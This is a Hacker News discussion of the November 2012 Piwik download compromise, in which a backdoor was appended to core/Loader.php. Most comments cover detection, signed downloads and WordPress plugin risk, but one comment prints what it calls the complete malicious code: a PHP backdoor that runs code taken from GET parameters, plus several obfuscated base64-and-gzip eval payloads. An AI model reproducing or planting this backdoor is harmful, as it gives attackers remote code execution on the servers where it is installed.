
Alert: Backdoor placed in Piwik - hendi_
http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
======
ck2
_attacker used a security issue in a WordPress plugin we were using_

I'm more interested in which WP plugin and if it was just out of date or if
this is a new vulnerability.

~~~
moepstar
You could use something like WPScan against their blog and then make educated
guesses which one was the culprit...

<https://github.com/wpscanteam/wpscan>

------
moepstar
Before you panic: the backdoor only has existed for a few hours in their
latest.zip yesterday

You're not affected if:

\- you checked Piwik out of their sourcecode repository \- installed /
upgraded Piwik before Nov 26th

Check if your piwik/core/Loader.php has some base64-encoded additions at the
end of the file

If not, your installation is clean :)

------
driverdan
Piwik should release a new version so all users get a message about updating
in their dashboard. That way someone who doesn't see this alert would be more
likely to fix it.

~~~
micheljansen
Agreed, but that alone wouldn't be enough.

If you read into what the hack does on the forums [1], it actually downloads
and installs a backdoor that can execute arbitrary commands on your server.
Unless a new version explicitly looks for and removes those files, updating is
not enough.

[1] <http://forum.piwik.org/read.php?2,97666>

------
Xylakant
Now, signed downloads might have helped if the keys are placed in a different
spot than the download. But I guess nobody bothers to check signatures
anyways.

------
binarymax

           eval(gzuncompress(base64_decode('eF...
    

Classic PHP injection hack.

~~~
tomjen3
Makes me wonder if you can simply disable to the 'eval' command in php and
avoid all these hacks?

Is it ever used by legitimate scripts?

~~~
RobAley
Yes, you can disable any arbitrary internal function in PHP using
disable_functions[1] directive in php.ini

[1] <http://php.net/manual/en/ini.core.php#ini.disable-functions>

Edit: Also, as noted below, this wouldn't prevent this or many other similar
hacks as you need write access to the PHP script to put the eval in in the
first place, so you could just write other code in there directly (and pull in
extra scripts to execute by writing to disk etc. if necessary). Eval is
typically dangerous, in its own right, when it is used by the legitimate
developer who then allows unchecked code to be passed to it.

~~~
infinity
The problem with disable_functions is that eval is not an internal function,
but a language construct. From the manual:

 _Only internal functions can be disabled using this directive._

It is possible to generate something like a list of all available internal
functions, eval is missing here:

    
    
      $arr = get_defined_functions();
      var_dump($arr['internal']);
    

The Suhosin extension will let you block eval, if it is available:

[http://www.hardened-
php.net/suhosin/configuration.html#suhos...](http://www.hardened-
php.net/suhosin/configuration.html#suhosin.executor.disable_eval)

~~~
RobAley
Apologies, you are correct, I was thinking of exec.

------
zalew
> security issue in a WordPress plugin

Classic. Installing random crap from the wp ecosystem is something I expect of
amateurs, but it's disappointing devs active in the foss community could
install and store such things on the same account as their software downloads
which btw aren't signed. Irresponsible. And why aren't they disclosing which
plugin was it?

(and sort of a bit related, in case somebody missed it: [http://wpmu.org/why-
you-should-never-search-for-free-wordpre...](http://wpmu.org/why-you-should-
never-search-for-free-wordpress-themes-in-google-or-anywhere-else/) )

~~~
Karunamon
>Installing random crap

Are you saying that reputable plugins have never had security issues? If not,
then what's your point?

------
polemic
Everyone should realize this by now, but if you must use Wordpress (or, host
your own blog) please physically & logically separate it from critical files
and infrastructure.

------
aw3c2
it does not say what the inserted code does, could somebody be so nice?
thanks!

~~~
bmohlenhoff
The injected code disables error logging and allows remote users to execute
arbitrary code on the server by submitting the 'g' and 's' parameters as part
of a GET query string. It then looks for a file called 'lic.log' and aborts if
it exists. Otherwise it decodes and decompresses a CURL script embedded in
base64 before generating the 'lic.log' file, which prevents it from occurring
more than once.

The real mystery is how that code got onto the development server to begin
with. They can fix the zip file but it won't do much good if the machine is
still compromised.

~~~
Adirael
From what I gather on their post someone used a vulnerable Wordpress plugin to
write onto the web server's filesystem, overwriting the latest.tar.gz file
with it's own hacked version. You should be safe if you didn't update using
that file.

------
jpdoctor
Would love to know how they detected it.

~~~
zalew
they didn't. some guy reported it on the forum
<http://forum.piwik.org/read.php?2,97666>

~~~
jpdoctor
Good find. Of course, it just changes my question to: How did _he_ find it?

~~~
klibertp
Either he noticed effects of running the exploit (lic.log file?) or just
downloaded the zip to read the code (I do this when some project's VCS doesn't
have 'browse source' component or it's web component has no decent syntax
highlighting), noticed base64 encoded chunks and got curious. I'd get curious
for sure.

All this is really simple and not the real question, which instead is: where
were checksums and why not in a safe place?

------
oncetwice
As luck would have it, I had the compromised version. First time trying out
Piwik as well ;) Oh well, c'est la vie.

------
sxsde
Has anyone the compromised Loader.php?

~~~
infinity
The article says that the malicious code has been appended to the loader.php
file. The malicious code cited in the article is abridged, here is a complete
version:

    
    
      <?php Error_Reporting(0);     if(isset($_GET['g']) && isset($_GET['s'])) { 
        preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit; 
      } 
      if (file_exists(dirname(__FILE__)."/lic.log")) exit; 

eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWEpFGwk4nZr4zkRGQsJn3kMND6jcBgayIKnkIX3n2tu1EieGARMoH3W8NXjBp4JAVQq8GFR/KcAbcyoSfhX9vzeU0R8K3mH313Q4UnAykzj9707HzHZ67PJndpyPSqKHbZ0kLq6N0s5KdDxSKYz7wkwE80mW6e3m3gbz8l0i2jh50b2sRJEnwjxJ1tOjVvumO9RrPHsT9BZNSN0qm2F2TlLDO9EqSNMADWCHW/LmLsvmbn009XNOA38yH6qNUm+a97jyA55xzFpgViGxa2SlN2ObBZQeuxwwL9kocnrzBWVXDMo=')));
?><?
eval(gzuncompress(base64_decode('eF5dj1tvgkAQhf+KDyRq0gdYUCGGB7RCaYGmwC6BpjHLpStXjbgoNv3vBUybxofJzJmc+U7mk1bRKd1Xoy0niAuBBzPATZh0+sVgWTkecTsZu540x96l9h2RMzKFvKjxISztJubNha7Crv40cYs3YjnC5bVdFWHKIXitSVT5c9MRBCPbUCvNiQ1QhoHYmJlytq4Kb2aQ2GXRBl7QJGux7TKouRbA+GHsqDaEqqS7nAU7CXNkI4hcpEoI5rncrZ6JPDRX7/34yWajx31j8Ks25C02BAWIAKQ+kE4GT2ik7c6dzQCXg9/O6hBE/XFUojLIWPkXoAzI0EMs1qS8z91ILrptOxKNNUTjm/znxxraBRpqB6B+x71L9J16MGgFj71hXPd/TJfH5ESP1SjEdTIXtnES7eNkwuB3Jv2YLr9/AJyvggM=')));
?><?
eval(gzuncompress(base64_decode('eF59VH9r2zAQ/SouBGoxE3SSf2I0lnVOCXhxsZ3tj2BE2JIRKMnwEtgo/e47ycliuZMDcpDu3rvT6d5lbXtsZbn9eWxP+8MPtz2eD99dSkg6kVRcdu8CtQUhwY8jn7OAAbrgERMTWWXll6xc921AGmf6XwsjTQd7zIuPs7xa30sOCUsSRkN536xp4/bdOfH6W594CFaBuZELprffuTZOaKwmhuHkfJFnUhJn2qcMCSHb3/tTujsfvp32x4PzLCV1J9LHFABXgCskLxMZWS/DGxdztRh9zEpG3sOqzIunWuIfEvp2/2Dgj8WdPWbLWqVjR4Umql58zoqVwgR2TGRi5kWeF1/z4mFWL4qld20JOmXB4EPsnLHJWWb1qlzW5WxZzbOyzzlcI5yJyflUVHWPifd+49uREEDfxpgvsvxTZfRlRFS7h6oxY2s3AGiukWDs4tBuT+f24CBZ+tpvP0Bzot6bqg8IPGKqA4GJTdtu/hjSiYl477w9TtSxoVVqagxAeaggpFMVRnLuhHBu0Uyto6TNA04aoVDpK365vR5cXRe0nMEXH6x+WimJmSROgt3m+ddWFYLrPO8UC3m51E4bMQEbp1YT+N5twOk0gpE0wg5yLUrgCCyKjjOM+u/9INA1CMXl8bh5iUC3Dbsyhs6N8IqiGtVNHNoNP8VonzmA6rVPwtg67wAHnpldNKYLrT2ITEQ85ExGKBjtKEj6F8qIppY=')));
?>

~~~
halfdan
Do you have a version of the core/DataTable/Filter/Megre.php file as well?

~~~
infinity
I'm sorry, I don't have this file, but I would like to look at it as well. If
you find it somewhere on the web, could you post a link here?

------
camus
About wp plugins : there is no quality control whatsoever in plugins published
on wordpress.org . One should review the code before installing one.

Unfortunatly, because of the architecture of Wordpress and PHP , there is not
"sandboxing" possible for plugins. However , always separate a wordpress blog
or any downloaded scripts from the rest of your apps. they should not have
access to anything but their space and their own database on the server.

A good architecture for a plugin system would be that the plugin uses some
kind of DSL(like a template language , so no direct php) , and the core should
be able to manage plugin rights ( like : "can read database" , "can write
database" , "can write files" , ... ). A slideshow plugin should not be able
to write files, or ever write to the database.

I'm really thinking about trying to develop such a system , with security at
the core, which is not the case of Wordpress.

